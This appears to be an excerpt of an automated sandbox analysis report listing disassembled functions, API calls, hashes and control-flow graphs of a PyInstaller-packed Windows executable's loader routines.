                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35C1E236B28A4286EB10EF68C4902BC7761FB49BA8F811275DE2E577E4DF78D451C390
                                                                                                                                                                                                                        Function 00007FF7F24F79B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • FindFirstFileW.KERNELBASE(?,00007FF7F24F7EF9,00007FF7F24F39E6), ref: 00007FF7F24F7A1B
                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?,00007FF7F24F7EF9,00007FF7F24F39E6), ref: 00007FF7F24F7A9E
                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE(?,00007FF7F24F7EF9,00007FF7F24F39E6), ref: 00007FF7F24F7ABD
                                                                                                                                                                                                                        • FindNextFileW.KERNELBASE(?,00007FF7F24F7EF9,00007FF7F24F39E6), ref: 00007FF7F24F7ACB
                                                                                                                                                                                                                        • FindClose.KERNEL32(?,00007FF7F24F7EF9,00007FF7F24F39E6), ref: 00007FF7F24F7ADC
                                                                                                                                                                                                                        • RemoveDirectoryW.KERNELBASE(?,00007FF7F24F7EF9,00007FF7F24F39E6), ref: 00007FF7F24F7AE5
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                                                                        • API String ID: 1057558799-766152087
                                                                                                                                                                                                                        • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                                        • Instruction ID: 264cb77d4d863264eb859bd86d2396ec5c8ae394cb436334f2d4df1fa1dbbac1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB418325A0CA4291EB20BB24E8545B9A361FBD8754FC10236D97D436C4DFFCDA4AC791
                                                                                                                                                                                                                        Function 00007FF7F24F85A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                        • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                        • Instruction ID: 39b7f9bc70126979e57ebdeaa6daa6e35a377f44b5645a3a255ecddea790f903
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2F0C822A1874186F7609F60B458776B350AB84728F840335D97D076D4CFBCE459CA40
                                                                                                                                                                                                                        Function 00007FF7F250FBD8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1010374628-0
                                                                                                                                                                                                                        • Opcode ID: 7ec5ba8ba8d84894c78f47bcf90823e76b6646eea6f6fc66034cda668971a161
                                                                                                                                                                                                                        • Instruction ID: 0b7c83e149b479713cab8bb8bb14fcae93c2cb7203f20ca24db32a9ed301e9a0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ec5ba8ba8d84894c78f47bcf90823e76b6646eea6f6fc66034cda668971a161
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C029C22B1D68381EB55FF11A805279A681BF41BA0FC456B5DD7D873D2EEBCE841C3A0
                                                                                                                                                                                                                        Function 00007FF7F24F18F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 179 7ff7f24f18f0-7ff7f24f192b call 7ff7f24f3f70 182 7ff7f24f1bc1-7ff7f24f1be5 call 7ff7f24fb870 179->182 183 7ff7f24f1931-7ff7f24f1971 call 7ff7f24f76a0 179->183 188 7ff7f24f1bae-7ff7f24f1bb1 call 7ff7f24ff36c 183->188 189 7ff7f24f1977-7ff7f24f1987 call 7ff7f24ff9f4 183->189 193 7ff7f24f1bb6-7ff7f24f1bbe 188->193 194 7ff7f24f19a1-7ff7f24f19bd call 7ff7f24ff6bc 189->194 195 7ff7f24f1989-7ff7f24f199c call 7ff7f24f2760 189->195 193->182 200 7ff7f24f19bf-7ff7f24f19d2 call 7ff7f24f2760 194->200 201 7ff7f24f19d7-7ff7f24f19ec call 7ff7f2504154 194->201 195->188 200->188 206 7ff7f24f1a06-7ff7f24f1a87 call 7ff7f24f1bf0 * 2 call 7ff7f24ff9f4 201->206 207 7ff7f24f19ee-7ff7f24f1a01 call 7ff7f24f2760 201->207 215 7ff7f24f1a8c-7ff7f24f1a9f call 7ff7f2504170 206->215 207->188 218 7ff7f24f1aa1-7ff7f24f1ab4 call 7ff7f24f2760 215->218 219 7ff7f24f1ab9-7ff7f24f1ad2 call 7ff7f24ff6bc 215->219 218->188 224 7ff7f24f1ad4-7ff7f24f1ae7 call 7ff7f24f2760 219->224 225 7ff7f24f1aec-7ff7f24f1b08 call 7ff7f24ff430 219->225 224->188 230 7ff7f24f1b1b-7ff7f24f1b29 225->230 231 7ff7f24f1b0a-7ff7f24f1b16 call 7ff7f24f25f0 225->231 230->188 232 7ff7f24f1b2f-7ff7f24f1b3e 230->232 231->188 234 7ff7f24f1b40-7ff7f24f1b46 232->234 236 7ff7f24f1b60-7ff7f24f1b6f 234->236 237 7ff7f24f1b48-7ff7f24f1b55 234->237 236->236 238 7ff7f24f1b71-7ff7f24f1b7a 236->238 237->238 239 7ff7f24f1b8f 238->239 240 7ff7f24f1b7c-7ff7f24f1b7f 238->240 242 7ff7f24f1b91-7ff7f24f1bac 239->242 240->239 241 7ff7f24f1b81-7ff7f24f1b84 240->241 241->239 243 7ff7f24f1b86-7ff7f24f1b89 241->243 242->188 242->234 243->239 244 7ff7f24f1b8b-7ff7f24f1b8d 243->244 244->242
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _fread_nolock$Message
                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                        • API String ID: 677216364-3497178890
                                                                                                                                                                                                                        • Opcode ID: c460ef6f806719c799c4882e24929e883d57d343d479ef8eebcdd9f4951844bd
                                                                                                                                                                                                                        • Instruction ID: 0792f8ad538d8e10a7e5c892c8f3cfba8ad72236d433cbe544a5f205c863bd92
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c460ef6f806719c799c4882e24929e883d57d343d479ef8eebcdd9f4951844bd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A071A231B1868685EB20FF18D4506B9A3A0FB88784F845035D9BD477D9EFECE945CBA0
                                                                                                                                                                                                                        Function 00007FF7F24F15C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 245 7ff7f24f15c0-7ff7f24f15d1 246 7ff7f24f15d3-7ff7f24f15dc call 7ff7f24f1050 245->246 247 7ff7f24f15f7-7ff7f24f1611 call 7ff7f24f3f70 245->247 252 7ff7f24f15ee-7ff7f24f15f6 246->252 253 7ff7f24f15de-7ff7f24f15e9 call 7ff7f24f25f0 246->253 254 7ff7f24f1613-7ff7f24f163a call 7ff7f24f2760 247->254 255 7ff7f24f163b-7ff7f24f1655 call 7ff7f24f3f70 247->255 253->252 261 7ff7f24f1671-7ff7f24f1688 call 7ff7f24ff9f4 255->261 262 7ff7f24f1657-7ff7f24f166c call 7ff7f24f25f0 255->262 268 7ff7f24f16ab-7ff7f24f16af 261->268 269 7ff7f24f168a-7ff7f24f16a6 call 7ff7f24f2760 261->269 267 7ff7f24f17c5-7ff7f24f17c8 call 7ff7f24ff36c 262->267 275 7ff7f24f17cd-7ff7f24f17df 267->275 272 7ff7f24f16b1-7ff7f24f16bd call 7ff7f24f11f0 268->272 273 7ff7f24f16c9-7ff7f24f16e9 call 7ff7f2504170 268->273 279 7ff7f24f17bd-7ff7f24f17c0 call 7ff7f24ff36c 269->279 280 7ff7f24f16c2-7ff7f24f16c4 272->280 281 7ff7f24f16eb-7ff7f24f1707 call 7ff7f24f2760 273->281 282 7ff7f24f170c-7ff7f24f1717 273->282 279->267 280->279 290 7ff7f24f17b3-7ff7f24f17b8 281->290 285 7ff7f24f17a6-7ff7f24f17ae call 7ff7f250415c 282->285 286 7ff7f24f171d-7ff7f24f1726 282->286 285->290 289 7ff7f24f1730-7ff7f24f1752 call 7ff7f24ff6bc 286->289 294 7ff7f24f1785-7ff7f24f178c 289->294 295 7ff7f24f1754-7ff7f24f176c call 7ff7f24ffdfc 289->295 290->279 296 7ff7f24f1793-7ff7f24f179c call 7ff7f24f2760 294->296 301 7ff7f24f1775-7ff7f24f1783 295->301 302 7ff7f24f176e-7ff7f24f1771 295->302 303 7ff7f24f17a1 296->303 301->296 302->289 304 7ff7f24f1773 302->304 303->285 304->303
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                        • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                        • API String ID: 2030045667-1550345328
                                                                                                                                                                                                                        • Opcode ID: 6320216ecf1ab69767b89908fb41d25bf920ee1ae2704caaac93011c15bf4516
                                                                                                                                                                                                                        • Instruction ID: b8e2c31a8a8321951181953fb5637ca8512fb97172c2462163909c6db0945539
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6320216ecf1ab69767b89908fb41d25bf920ee1ae2704caaac93011c15bf4516
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B951BD21B08A4392EB10BB11A9505B9A3A0BF84BA4FC40131ED3D076D5EFFCE945CBA0
                                                                                                                                                                                                                        Function 00007FF7F24F7FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                        • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                                                        • API String ID: 2895956056-699529898
                                                                                                                                                                                                                        • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                        • Instruction ID: 3315193e8ad8b1f1d1671e57bcceed36589ca0ccbeae0a6f43d3aff06a7877bb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C641FF31A0878281DB20AF64E8552AEA2A1FBC9370F900735E6BD477D5DFBCD545CB90
                                                                                                                                                                                                                        Function 00007FF7F24F11F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                        • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                        • Opcode ID: 56c9dbaed340d0ed044521a6c9d65125b35e17f9c64d3b309c5efef7fe4d0be7
                                                                                                                                                                                                                        • Instruction ID: 8d6d9a6c58a651a3fa4445c53220ff842bcc998376b88ad0a511dc50684a7022
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56c9dbaed340d0ed044521a6c9d65125b35e17f9c64d3b309c5efef7fe4d0be7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A251C322A0864281EB60BB15A8503BAA291FFC4794FC44135ED7D47BD5EFFCE945CBA0
                                                                                                                                                                                                                        Function 00007FF7F250E020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF7F250E3BA,?,?,-00000018,00007FF7F250A063,?,?,?,00007FF7F2509F5A,?,?,?,00007FF7F250524E), ref: 00007FF7F250E19C
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7F250E3BA,?,?,-00000018,00007FF7F250A063,?,?,?,00007FF7F2509F5A,?,?,?,00007FF7F250524E), ref: 00007FF7F250E1A8
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                                                                                                                        • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                        • Instruction ID: 6232312300bd06d78866d4265c4e3b3748be22ef13b8b5dbf2faf8539ecdbe60
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 00410231B1961381EB19EF12AC00675B292BF45BA0F985175DD2D877C4EEBCE805C3A0
                                                                                                                                                                                                                        Function 00007FF7F24F7C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF7F24F3834), ref: 00007FF7F24F7CE4
                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF7F24F3834), ref: 00007FF7F24F7D2C
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7E10: GetEnvironmentVariableW.KERNEL32(00007FF7F24F365F), ref: 00007FF7F24F7E47
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7F24F7E69
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2507548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F2507561
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F26C0: MessageBoxW.USER32 ref: 00007FF7F24F2736
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                        • API String ID: 740614611-1339014028
                                                                                                                                                                                                                        • Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                                                                                                                                        • Instruction ID: 516b33587d0804e04fd53167681af8d33e641a06bf89c1b8f96d020f29fb29ce
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C416915B0968281FB20FF6199512F99291AF89B90FC04031EE3D577D6EEFCE900C2E1
                                                                                                                                                                                                                        Function 00007FF7F250AD6C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
